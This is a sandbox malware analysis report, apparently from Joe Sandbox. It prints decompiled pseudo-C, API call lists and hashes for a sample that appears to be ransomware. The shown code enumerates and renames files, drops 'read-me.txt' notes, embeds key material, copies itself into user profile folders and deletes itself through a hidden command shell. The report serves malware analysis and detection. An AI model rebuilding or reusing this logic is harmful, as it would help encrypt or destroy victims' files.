                                                                                                                                                        				void* _t136;
                                                                                                                                                        				long _t140;
                                                                                                                                                        				void* _t142;
                                                                                                                                                        				void* _t147;
                                                                                                                                                        				void* _t149;
                                                                                                                                                        
                                                                                                                                                        				L0040A3DA();
                                                                                                                                                        				E00406429( &_a608);
                                                                                                                                                        				E00406956( &_a924);
                                                                                                                                                        				if(E0040643F( &_a600, E004069E5,  &_a920, 0, 0) == 0) {
                                                                                                                                                        					_t64 = _a9636;
                                                                                                                                                        					_v0 = 0;
                                                                                                                                                        					_a4.dwFileAttributes =  *(_t64 + 4);
                                                                                                                                                        					_t138 =  *(_t64 + 8);
                                                                                                                                                        					_a12.dwFileAttributes =  *(_t64 + 8);
                                                                                                                                                        					_push(E004093F4( *_t64, 0));
                                                                                                                                                        					E0040A321(__eflags,  &_v8);
                                                                                                                                                        					__eflags = E0040A38D( &_v16);
                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                        						L23:
                                                                                                                                                        						E0040645C( &_a604);
                                                                                                                                                        						E0040698B( &_a920);
                                                                                                                                                        						_t74 = 0;
                                                                                                                                                        						__eflags = 0;
                                                                                                                                                        						goto L24;
                                                                                                                                                        					} else {
                                                                                                                                                        						_t136 = lstrcatW;
                                                                                                                                                        						do {
                                                                                                                                                        							E0040A356(__eflags,  &_v4,  &_a1436);
                                                                                                                                                        							_t140 = lstrlenW( &_a1428);
                                                                                                                                                        							_v4 = _t140;
                                                                                                                                                        							lstrcatW( &_a1428, "*");
                                                                                                                                                        							_t84 = FindFirstFileW( &_a1428,  &_a4); // executed
                                                                                                                                                        							_t147 = _t84;
                                                                                                                                                        							__eflags = _t147 - 0xffffffff;
                                                                                                                                                        							if(_t147 == 0xffffffff) {
                                                                                                                                                        								goto L21;
                                                                                                                                                        							} else {
                                                                                                                                                        								goto L5;
                                                                                                                                                        							}
                                                                                                                                                        							do {
                                                                                                                                                        								L5:
                                                                                                                                                        								_t88 = lstrcmpiW( &_a56, ".");
                                                                                                                                                        								__eflags = _t88;
                                                                                                                                                        								if(_t88 != 0) {
                                                                                                                                                        									_t93 = lstrcmpiW( &_a56, L"..");
                                                                                                                                                        									__eflags = _t93;
                                                                                                                                                        									if(_t93 != 0) {
                                                                                                                                                        										 *((short*)(_t149 + 0x5b0 + _t140 * 2)) = 0;
                                                                                                                                                        										lstrcatW( &_a1436,  &_a56);
                                                                                                                                                        										_t99 = E004094B3( &_a56, 0);
                                                                                                                                                        										__eflags = _a4.dwFileAttributes & 0x00000010;
                                                                                                                                                        										_t142 = _t99;
                                                                                                                                                        										if((_a4.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                        											_t100 = E0040922B(_t142, 1);
                                                                                                                                                        											__eflags = _t100;
                                                                                                                                                        											if(_t100 == 0) {
                                                                                                                                                        												_t103 = lstrcmpiW( &_a56,  *0x40cab0);
                                                                                                                                                        												__eflags = _t103;
                                                                                                                                                        												if(_t103 != 0) {
                                                                                                                                                        													_t105 = lstrcmpiW( &_a56,  *0x40caac);
                                                                                                                                                        													__eflags = _t105;
                                                                                                                                                        													if(_t105 != 0) {
                                                                                                                                                        														_t108 = lstrcmpiW( &_a56, PathFindFileNameW( *0x40caa8));
                                                                                                                                                        														__eflags = _t108;
                                                                                                                                                        														if(_t108 != 0) {
                                                                                                                                                        															_t109 = _a12.dwFileAttributes;
                                                                                                                                                        															__eflags = _t109 & 0x00000001;
                                                                                                                                                        															if(__eflags != 0) {
                                                                                                                                                        																_t123 = _t109 & 0xfffffffe;
                                                                                                                                                        																__eflags = _t123;
                                                                                                                                                        																SetFileAttributesW( &_a1436, _t123); // executed
                                                                                                                                                        															}
                                                                                                                                                        															_push( &_a604);
                                                                                                                                                        															_push(_a8);
                                                                                                                                                        															_push(_v0);
                                                                                                                                                        															_push( &_a1436);
                                                                                                                                                        															__eflags = E00408D77(_t138, __eflags);
                                                                                                                                                        															if(__eflags == 0) {
                                                                                                                                                        																lstrcpyW( &_a5516,  &_a1420);
                                                                                                                                                        																lstrcatW( &_a5516,  *0x40ca98);
                                                                                                                                                        																MoveFileExW( &_a1420,  &_a5516, 1); // executed
                                                                                                                                                        																E0040934A(_t136, __eflags,  &_a1420); // executed
                                                                                                                                                        															}
                                                                                                                                                        														}
                                                                                                                                                        													}
                                                                                                                                                        												}
                                                                                                                                                        											}
                                                                                                                                                        										} else {
                                                                                                                                                        											__eflags = E0040922B(_t142, 0);
                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                        												lstrcatW( &_a1436, "\\");
                                                                                                                                                        												_push( &_a1436);
                                                                                                                                                        												E0040A321(__eflags,  &_v4);
                                                                                                                                                        											}
                                                                                                                                                        										}
                                                                                                                                                        										E00402765(_t142);
                                                                                                                                                        										_t140 = _a4.dwFileAttributes;
                                                                                                                                                        										_pop(_t138);
                                                                                                                                                        									}
                                                                                                                                                        								}
                                                                                                                                                        								_t90 = FindNextFileW(_t147,  &_a12); // executed
                                                                                                                                                        								__eflags = _t90;
                                                                                                                                                        							} while (_t90 != 0);
                                                                                                                                                        							FindClose(_t147);
                                                                                                                                                        							L21:
                                                                                                                                                        							__eflags = E0040A38D( &_v4);
                                                                                                                                                        						} while (__eflags == 0);
                                                                                                                                                        						goto L23;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					_t74 = 1;
                                                                                                                                                        					L24:
                                                                                                                                                        					return _t74;
                                                                                                                                                        				}
                                                                                                                                                        			}


























                                                                                                                                                        0x004096dc
                                                                                                                                                        0x004096ea
                                                                                                                                                        0x004096f7
                                                                                                                                                        0x0040971c
                                                                                                                                                        0x00409726
                                                                                                                                                        0x0040972e
                                                                                                                                                        0x00409737
                                                                                                                                                        0x0040973b
                                                                                                                                                        0x0040973e
                                                                                                                                                        0x00409747
                                                                                                                                                        0x0040974d
                                                                                                                                                        0x0040975c
                                                                                                                                                        0x0040975e
                                                                                                                                                        0x00409969
                                                                                                                                                        0x00409971
                                                                                                                                                        0x0040997e
                                                                                                                                                        0x00409983
                                                                                                                                                        0x00409983
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409764
                                                                                                                                                        0x00409764
                                                                                                                                                        0x00409773
                                                                                                                                                        0x00409780
                                                                                                                                                        0x00409793
                                                                                                                                                        0x004097a2
                                                                                                                                                        0x004097a6
                                                                                                                                                        0x004097b5
                                                                                                                                                        0x004097bb
                                                                                                                                                        0x004097bd
                                                                                                                                                        0x004097c0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004097c6
                                                                                                                                                        0x004097c6
                                                                                                                                                        0x004097d0
                                                                                                                                                        0x004097d2
                                                                                                                                                        0x004097d4
                                                                                                                                                        0x004097e4
                                                                                                                                                        0x004097e6
                                                                                                                                                        0x004097e8
                                                                                                                                                        0x004097f0
                                                                                                                                                        0x00409805
                                                                                                                                                        0x0040980e
                                                                                                                                                        0x00409813
                                                                                                                                                        0x00409818
                                                                                                                                                        0x0040981a
                                                                                                                                                        0x00409855
                                                                                                                                                        0x0040985a
                                                                                                                                                        0x0040985c
                                                                                                                                                        0x0040986d
                                                                                                                                                        0x0040986f
                                                                                                                                                        0x00409871
                                                                                                                                                        0x00409882
                                                                                                                                                        0x00409884
                                                                                                                                                        0x00409886
                                                                                                                                                        0x0040989e
                                                                                                                                                        0x004098a0
                                                                                                                                                        0x004098a2
                                                                                                                                                        0x004098a8
                                                                                                                                                        0x004098ac
                                                                                                                                                        0x004098ae
                                                                                                                                                        0x004098b0
                                                                                                                                                        0x004098b0
                                                                                                                                                        0x004098bc
                                                                                                                                                        0x004098bc
                                                                                                                                                        0x004098c9
                                                                                                                                                        0x004098ca
                                                                                                                                                        0x004098d5
                                                                                                                                                        0x004098d9
                                                                                                                                                        0x004098df
                                                                                                                                                        0x004098e1
                                                                                                                                                        0x004098f3
                                                                                                                                                        0x00409907
                                                                                                                                                        0x0040991b
                                                                                                                                                        0x00409929
                                                                                                                                                        0x00409929
                                                                                                                                                        0x004098e1
                                                                                                                                                        0x004098a2
                                                                                                                                                        0x00409886
                                                                                                                                                        0x00409871
                                                                                                                                                        0x0040981c
                                                                                                                                                        0x00409824
                                                                                                                                                        0x00409826
                                                                                                                                                        0x00409839
                                                                                                                                                        0x00409842
                                                                                                                                                        0x00409848
                                                                                                                                                        0x00409848
                                                                                                                                                        0x00409826
                                                                                                                                                        0x0040992f
                                                                                                                                                        0x00409934
                                                                                                                                                        0x00409938
                                                                                                                                                        0x00409938
                                                                                                                                                        0x004097e8
                                                                                                                                                        0x0040993f
                                                                                                                                                        0x00409945
                                                                                                                                                        0x00409945
                                                                                                                                                        0x0040994e
                                                                                                                                                        0x00409954
                                                                                                                                                        0x0040995e
                                                                                                                                                        0x0040995e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00409968
                                                                                                                                                        0x0040971e
                                                                                                                                                        0x00409720
                                                                                                                                                        0x00409985
                                                                                                                                                        0x0040998c
                                                                                                                                                        0x0040998c

                                                                                                                                                        APIs
                                                                                                                                                        • _chkstk.NTDLL ref: 004096DC
                                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00000000,?,004069E5,?,00000000,00000000), ref: 0040978D
                                                                                                                                                        • lstrcatW.KERNEL32(?,004020D4), ref: 004097A6
                                                                                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00000000,?,004069E5,?,00000000,00000000,?), ref: 004097B5
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,004020D8,?,?,?,?,?,00000000,?,00000000,?,004069E5,?,00000000,00000000,?), ref: 004097D0
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,004020DC,?,?,?,?,?,00000000,?,00000000,?,004069E5,?,00000000,00000000,?), ref: 004097E4
                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00409805
                                                                                                                                                        • lstrcatW.KERNEL32(?,004020E4), ref: 00409839
                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,?,?,?,?,?,?,00000000,?,00000000,?,004069E5,?,00000000,00000000,?), ref: 0040993F
                                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,00000000,?,00000000,?,004069E5,?,00000000,00000000,?,?), ref: 0040994E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Findlstrcat$Filelstrcmpi$CloseFirstNext_chkstklstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1305186886-0
                                                                                                                                                        • Opcode ID: 7cb102cc3024edba2f7210727dff0ded47bc067fff52d60fa4782bd73aaed339
                                                                                                                                                        • Instruction ID: 39c99a8f7df71d52df4eaeb52f342f104aaab1783d591f16eee7fbef32609884
                                                                                                                                                        • Opcode Fuzzy Hash: 7cb102cc3024edba2f7210727dff0ded47bc067fff52d60fa4782bd73aaed339
                                                                                                                                                        • Instruction Fuzzy Hash: E5611272508349ABD720EBA1DD84E9B77DCAF48344F04093FB685E3191EB78D5058B6A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 345 406bce-406bef CryptAcquireContextW 346 406bf1-406bf4 345->346 347 406bf6-406c0d CryptGenRandom 345->347 350 406c25-406c28 346->350 348 406c1a-406c22 CryptReleaseContext 347->348 349 406c0f-406c18 CryptReleaseContext 347->349 351 406c24 348->351 349->351 351->350
                                                                                                                                                        APIs
                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00406BE7
                                                                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?), ref: 00406C01
                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00406C0F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1815803762-0
                                                                                                                                                        • Opcode ID: 9e858ebe04c30f1740c957255ed278d2cbde2db295846ba43d6d4efd68943b4b
                                                                                                                                                        • Instruction ID: 0c9f8cf0affd12b225debe2e3aff299672ea0f7f17e54056c30e356589fa212e
                                                                                                                                                        • Opcode Fuzzy Hash: 9e858ebe04c30f1740c957255ed278d2cbde2db295846ba43d6d4efd68943b4b
                                                                                                                                                        • Instruction Fuzzy Hash: 07F0627210811BBFEB108FA5ED44E977B6CEB443A4B110436FA46E11A0D3349C60AB75
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 372 402765-402778 GetProcessHeap RtlFreeHeap
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00402765(void* _a4) {
                                                                                                                                                        				char _t3;
                                                                                                                                                        
                                                                                                                                                        				_t3 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                        				return _t3;
                                                                                                                                                        			}




                                                                                                                                                        0x00402772
                                                                                                                                                        0x00402778

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00406CDD,00000000,00000000,?,?,00408C4B,?,?,00408C2E,?,00000000,00000006,00000001,?), ref: 0040276B
                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00402772
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.587096613.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_7_2_400000_Mm7Yq5V7Lu.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                        • Opcode ID: 7c0b6860fad79a09e544aa126bfdb932097d8dfca3d437fcdffbdfe3b3f3dea2
                                                                                                                                                        • Instruction ID: 9a993611a673c6aacbff9ddbd357a5623182458b851d8d621dc20ec3200b4def
                                                                                                                                                        • Opcode Fuzzy Hash: 7c0b6860fad79a09e544aa126bfdb932097d8dfca3d437fcdffbdfe3b3f3dea2
                                                                                                                                                        • Instruction Fuzzy Hash: 24B012314152C0EBCF001BE09F0CF093BA4BB44703F004450F389D24B0C6304080DF19
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                        			E00409C57(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                        				struct _SHELLEXECUTEINFOW _v64;
                                                                                                                                                        				short _v4160;
                                                                                                                                                        				char _v4226;
                                                                                                                                                        				short _v4228;
                                                                                                                                                        				void _v8256;
                                                                                                                                                        				short _v8324;
                                                                                                                                                        				short _v12352;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				WCHAR* __esi;
                                                                                                                                                        				long __ebp;
                                                                                                                                                        				intOrPtr _t23;
                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                        				int _t39;
                                                                                                                                                        				int _t41;
                                                                                                                                                        				int _t42;
                                                                                                                                                        				WCHAR* _t44;
                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                        				int _t65;
                                                                                                                                                        				long _t84;
                                                                                                                                                        				int _t85;
                                                                                                                                                        				int _t86;
                                                                                                                                                        				WCHAR* _t90;
                                                                                                                                                        				void* _t93;
                                                                                                                                                        				void* _t96;
                                                                                                                                                        				void* _t97;
                                                                                                                                                        				int _t100;
                                                                                                                                                        				long _t112;
                                                                                                                                                        				void* _t119;
                                                                                                                                                        				void* _t120;
                                                                                                                                                        
                                                                                                                                                        				_t123 = __eflags;
                                                                                                                                                        				_t97 = __edx;
                                                                                                                                                        				_push(__ebx);
                                                                                                                                                        				_t104 = "CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A220170BE4EFE2ABD73679449A9F6D76945658163AC438EA18DA29B256F6314054ED3CFBFA076B26E03E7E0AA7ED248094F4FD6DB36CC1927B4F0A8BB905407C22D92A6B0C6E91FE9C9FB7BE8DA319331650D42BA7552C96459064ABED01516477AE1FA5334241988FFA0E504710A8290CFAC1263F11C7AC0F6FC5692CC77F9";
                                                                                                                                                        				_push(0);
                                                                                                                                                        				_push(0x20);
                                                                                                                                                        				_push(0x401124);
                                                                                                                                                        				_push(0x210);
                                                                                                                                                        				_push("CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A220170BE4EFE2ABD73679449A9F6D76945658163AC438EA18DA29B256F6314054ED3CFBFA076B26E03E7E0AA7ED248094F4FD6DB36CC1927B4F0A8BB905407C22D92A6B0C6E91FE9C9FB7BE8DA319331650D42BA7552C96459064ABED01516477AE1FA5334241988FFA0E504710A8290CFAC1263F11C7AC0F6FC5692CC77F9");
                                                                                                                                                        				E00408B05(__ebx, __ecx, 0, "CAE1654F55FE4692647494D623469117E131FC85F678D164EE4F9296D2ABCC359AE6444E4C8A3B8A03D8363DB439A9C876CFD2FDCA63BACCEDDF6AE123D4CC860243E9DFBCC7CB552B7694F88C52F5DBEB767BC3B7EE07E6F4731390CCD6BB5A34768663560D9A12670464BF977246A08FF490B2FDDF65DBE2756AB7FC01E9CC5A220170BE4EFE2ABD73679449A9F6D76945658163AC438EA18DA29B256F6314054ED3CFBFA076B26E03E7E0AA7ED248094F4FD6DB36CC1927B4F0A8BB905407C22D92A6B0C6E91FE9C9FB7BE8DA319331650D42BA7552C96459064ABED01516477AE1FA5334241988FFA0E504710A8290CFAC1263F11C7AC0F6FC5692CC77F9", __eflags);
                                                                                                                                                        				_t23 = E00402779(0x20);
                                                                                                                                                        				_pop(_t93);
                                                                                                                                                        				 *0x40ca8c = _t23;
                                                                                                                                                        				E004088F4(_t93, __eflags, _t104, 0x200, _t23, 0);
                                                                                                                                                        				 *0x40caa8 = E0040278D( *0x40caa8, 0x1000);
                                                                                                                                                        				 *0x40caa4 = E0040278D( *0x40caa4, 0x9b4);
                                                                                                                                                        				E00402647(_t26, 0, 0x9b4);
                                                                                                                                                        				_t120 = _t119 + 0x1c;
                                                                                                                                                        				GetModuleFileNameW(0,  *0x40caa8, 0x800);
                                                                                                                                                        				_push(0);
                                                                                                                                                        				_push(0x20);
                                                                                                                                                        				_push( *0x40ca8c);
                                                                                                                                                        				_push(0x30);
                                                                                                                                                        				_push(0x4017b8);
                                                                                                                                                        				E00408B05(0x1000, _t93, 0, 0x4017b8, _t123);
                                                                                                                                                        				_push(0);
                                                                                                                                                        				_push(0x20);
                                                                                                                                                        				_push( *0x40ca8c);
                                                                                                                                                        				_push(0x30);
                                                                                                                                                        				_push("read-me.txt");
                                                                                                                                                        				E00408B05(0x1000, _t93, 0, 0x4017b8, _t123);
                                                                                                                                                        				_t31 = E004093F4(0x4017b8, 0);
                                                                                                                                                        				_push(0x290);
                                                                                                                                                        				 *0x40ca98 = _t31;
                                                                                                                                                        				_t32 = E00409AAB(_t93, _t123, "Windows", 0x40ca9c,  *0x40ca8c);
                                                                                                                                                        				_push(0x110);
                                                                                                                                                        				 *0x40caa0 = _t32;
                                                                                                                                                        				 *0x40cab4 = E00409AAB(_t93, _t123, ".xls", 0x40c638,  *0x40ca8c);
                                                                                                                                                        				_t107 = E00402779(0x1000);
                                                                                                                                                        				if(GetEnvironmentVariableW(L"LOCALAPPDATA", _t107, 0x800) != 0) {
                                                                                                                                                        					L9:
                                                                                                                                                        					PathAddBackslashW(_t107);
                                                                                                                                                        					lstrcatW(_t107, PathFindFileNameW( *0x40caa8));
                                                                                                                                                        					_t39 = lstrcmpiW( *0x40caa8, _t107); // executed
                                                                                                                                                        					_push(_t107);
                                                                                                                                                        					__eflags = _t39;
                                                                                                                                                        					if(_t39 == 0) {
                                                                                                                                                        						L13:
                                                                                                                                                        						E00409610();
                                                                                                                                                        						L14:
                                                                                                                                                        						_t41 = E00402779(0x1000);
                                                                                                                                                        						_t107 = 0x800;
                                                                                                                                                        						_t100 = _t41;
                                                                                                                                                        						_t42 = GetEnvironmentVariableW(L"public", _t100, 0x800);
                                                                                                                                                        						__eflags = _t42;
                                                                                                                                                        						if(_t42 != 0) {
                                                                                                                                                        							L17:
                                                                                                                                                        							 *0x40cab0 = E0040278D( *0x40cab0, 0x98);
                                                                                                                                                        							_t44 = E0040278D( *0x40caac, 0x40);
                                                                                                                                                        							_t120 = _t120 + 0x10;
                                                                                                                                                        							 *0x40caac = _t44;
                                                                                                                                                        							_push(0);
                                                                                                                                                        							 *0x40caac = E004093F4(E00402828(),  *0x40ca8c);
                                                                                                                                                        							lstrcpyW( *0x40cab0, E004093F4("read-me.txt", 0));
                                                                                                                                                        							_t49 = E00402779(0x1000);
                                                                                                                                                        							_t96 = 0x20;
                                                                                                                                                        							_t90 = _t49;
                                                                                                                                                        							lstrcpyW(_t90, _t100);
                                                                                                                                                        							PathAddBackslashW(_t90);
                                                                                                                                                        							lstrcatW(_t90,  *0x40caac);
                                                                                                                                                        							_t107 = 0xa;
                                                                                                                                                        							while(1) {
                                                                                                                                                        								_t100 = E00409B37(_t97, _t90);
                                                                                                                                                        								__eflags = _t100;
                                                                                                                                                        								if(_t100 != 0) {
                                                                                                                                                        									_t107 = _t107 - 1;
                                                                                                                                                        									__eflags = _t107;
                                                                                                                                                        									Sleep(0x3e8);
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t107;
                                                                                                                                                        								if(_t107 <= 0) {
                                                                                                                                                        									break;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t100;
                                                                                                                                                        								if(_t100 != 0) {
                                                                                                                                                        									continue;
                                                                                                                                                        								}
                                                                                                                                                        								break;
                                                                                                                                                        							}
                                                                                                                                                        							__eflags = _t107 - 1;
                                                                                                                                                        							if(_t107 >= 1) {
                                                                                                                                                        								 *0x40ca94 = E0040278D( *0x40ca94,  *0x401928);
                                                                                                                                                        								E00402625(_t54,  *0x401144,  *0x401928);
                                                                                                                                                        								 *0x40ca90 = E0040278D( *0x40ca90,  *0x401930);
                                                                                                                                                        								E00402625(_t56,  *0x40192c,  *0x401930);
                                                                                                                                                        								_t120 = _t120 + 0x28;
                                                                                                                                                        								E0040998F(_t96, __eflags,  *0x40caa4, "67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A\nA4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB\nA9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40\nE7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66\nC0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82\n5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C\n92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D\n12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0\n72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D\n30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0\nE2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2\nAC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C\n5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10\n6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32\nE4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5\n79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74\n");
                                                                                                                                                        								E00409435();
                                                                                                                                                        								_pop(0);
                                                                                                                                                        								_pop(_t107);
                                                                                                                                                        								_pop(0x800);
                                                                                                                                                        								_push(0x800);
                                                                                                                                                        								L0040A3DA();
                                                                                                                                                        								_push(_t107);
                                                                                                                                                        								_push(0);
                                                                                                                                                        								_v4228 = 0;
                                                                                                                                                        								E00402647( &_v4226, 0, 0xffe);
                                                                                                                                                        								_t65 = GetModuleFileNameW(0,  &_v8324, 0x800);
                                                                                                                                                        								if(_t65 != 0) {
                                                                                                                                                        									_t65 = GetEnvironmentVariableW(L"COMSPEC",  &_v12352, 0x800);
                                                                                                                                                        									if(_t65 != 0) {
                                                                                                                                                        										lstrcatW( &_v4160, L"/c del ");
                                                                                                                                                        										lstrcatW( &_v4160,  &_v8256);
                                                                                                                                                        										lstrcatW( &_v4160, L" > nul");
                                                                                                                                                        										_v64.cbSize = 0x3c;
                                                                                                                                                        										_v64.lpFile =  &_v12352;
                                                                                                                                                        										_v64.lpParameters =  &_v4160;
                                                                                                                                                        										_t112 = 0x40;
                                                                                                                                                        										_v64.hwnd = 0;
                                                                                                                                                        										_v64.lpVerb = L"Open";
                                                                                                                                                        										_v64.lpDirectory = 0;
                                                                                                                                                        										_v64.nShow = 0;
                                                                                                                                                        										_v64.fMask = lstrcatW;
                                                                                                                                                        										_t65 = ShellExecuteExW( &_v64);
                                                                                                                                                        										if(_t65 != 0) {
                                                                                                                                                        											SetPriorityClass(_v64.hProcess, _t112);
                                                                                                                                                        											_push(0x100);
                                                                                                                                                        											SetPriorityClass(GetCurrentProcess(), 0);
                                                                                                                                                        											_push(0xf);
                                                                                                                                                        											SetThreadPriority(GetCurrentThread(), 0);
                                                                                                                                                        											SHChangeNotify(4, 5,  &_v8256, 0);
                                                                                                                                                        											_t65 = 1;
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        								}
                                                                                                                                                        								return _t65;
                                                                                                                                                        							}
                                                                                                                                                        							_push(1);
                                                                                                                                                        							goto L8;
                                                                                                                                                        						}
                                                                                                                                                        						_t84 = GetEnvironmentVariableW(L"ALLUSERSPROFILE", _t100, 0x800);
                                                                                                                                                        						__eflags = _t84;
                                                                                                                                                        						if(_t84 != 0) {
                                                                                                                                                        							goto L17;
                                                                                                                                                        						}
                                                                                                                                                        						_push(_t84);
                                                                                                                                                        						goto L8;
                                                                                                                                                        					}
                                                                                                                                                        					_t85 = E00409333();
                                                                                                                                                        					__eflags = _t85;
                                                                                                                                                        					if(_t85 != 0) {
                                                                                                                                                        						L12:
                                                                                                                                                        						_push(_t107);
                                                                                                                                                        						goto L13;
                                                                                                                                                        					}
                                                                                                                                                        					_t86 = CopyFileW( *0x40caa8, _t107, _t100); // executed
                                                                                                                                                        					__eflags = _t86;
                                                                                                                                                        					if(_t86 == 0) {
                                                                                                                                                        						goto L14;
                                                                                                                                                        					}
                                                                                                                                                        					goto L12;
                                                                                                                                                        				} else {
                                                                                                                                                        					__eax = GetEnvironmentVariableW(L"APPDATA", __esi, __ebp);
                                                                                                                                                        					__eflags = __eax;
                                                                                                                                                        					if(__eax != 0) {
                                                                                                                                                        						goto L9;
                                                                                                                                                        					}
                                                                                                                                                        					_push(0);
                                                                                                                                                        					L8:
                                                                                                                                                        					ExitProcess();
                                                                                                                                                        				}
                                                                                                                                                        			}

































                                                                                                                                                        0x00409c57
                                                                                                                                                        0x00409c57
                                                                                                                                                        0x00409c57
                                                                                                                                                        0x00409c5d
                                                                                                                                                        0x00409c62
                                                                                                                                                        0x00409c63
                                                                                                                                                        0x00409c65
                                                                                                                                                        0x00409c6a
                                                                                                                                                        0x00409c6f
                                                                                                                                                        0x00409c70
                                                                                                                                                        0x00409c77
                                                                                                                                                        0x00409c7c
                                                                                                                                                        0x00409c85
                                                                                                                                                        0x00409c8a
                                                                                                                                                        0x00409ca5
                                                                                                                                                        0x00409cb9
                                                                                                                                                        0x00409cbe
                                                                                                                                                        0x00409cc3
                                                                                                                                                        0x00409cd3
                                                                                                                                                        0x00409cd9
                                                                                                                                                        0x00409cda
                                                                                                                                                        0x00409cdc
                                                                                                                                                        0x00409ce7
                                                                                                                                                        0x00409ce9
                                                                                                                                                        0x00409cea
                                                                                                                                                        0x00409cef
                                                                                                                                                        0x00409cf0
                                                                                                                                                        0x00409cf2
                                                                                                                                                        0x00409cf8
                                                                                                                                                        0x00409cfa
                                                                                                                                                        0x00409cff
                                                                                                                                                        0x00409d06
                                                                                                                                                        0x00409d0b
                                                                                                                                                        0x00409d16
                                                                                                                                                        0x00409d25
                                                                                                                                                        0x00409d2a
                                                                                                                                                        0x00409d35
                                                                                                                                                        0x00409d4a
                                                                                                                                                        0x00409d5a
                                                                                                                                                        0x00409d68
                                                                                                                                                        0x00409d7e
